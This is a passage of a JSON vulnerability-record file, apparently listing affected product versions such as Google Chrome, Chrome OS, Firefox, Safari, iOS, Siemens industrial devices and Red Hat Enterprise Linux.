        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.119"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.810.0"
      },
      {
        "_id": null,
        "model": "simotion p320-4e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.871.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.31"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.51"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364160"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1681.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.41"
      },
      {
        "_id": null,
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.3,
        "vendor": "google",
        "version": null
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.649.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.354.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.114"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.316.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.692.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.17"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "13.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.83"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.122"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.17"
      },
      {
        "_id": null,
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.93"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.630.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.21"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.154.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.885.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.569.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.89"
      },
      {
        "_id": null,
        "model": "simatic itp3000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "v20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.962.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1675.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.306.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.295.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.123"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.318.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.619.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.14"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1004"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.124"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.100"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1033"
      },
      {
        "_id": null,
        "model": "simatic ipc627c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1044"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.160"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1679.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.23"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.114"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.70"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.51"
      },
      {
        "_id": null,
        "model": "enterprise linux for scientific computing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.539.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.661.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.106"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.91"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.105"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.939.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.474.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.110"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.893.1"
      },
      {
        "_id": null,
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.99"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.883.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.306"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.62"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.348.0"
      },
      {
        "_id": null,
        "model": "simatic hmi comfort panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.2"
      },
      {
        "_id": null,
        "model": "windows server r2 for itanium-based systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.7"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "20.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.120"
      },
      {
        "_id": null,
        "model": "simatic itp1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.935.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.705.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1082.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.122"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1016.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.395.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.118"
      },
      {
        "_id": null,
        "model": "ruggedcom rx1400 vpe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.776.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.3"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.8"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.72"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.91"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1075.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.24"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14.01"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.117"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.535.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.4.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.443.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.296.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.107"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.7"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.776.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.96379"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.217"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.114"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.900.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1074.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.126"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.19"
      },
      {
        "_id": null,
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
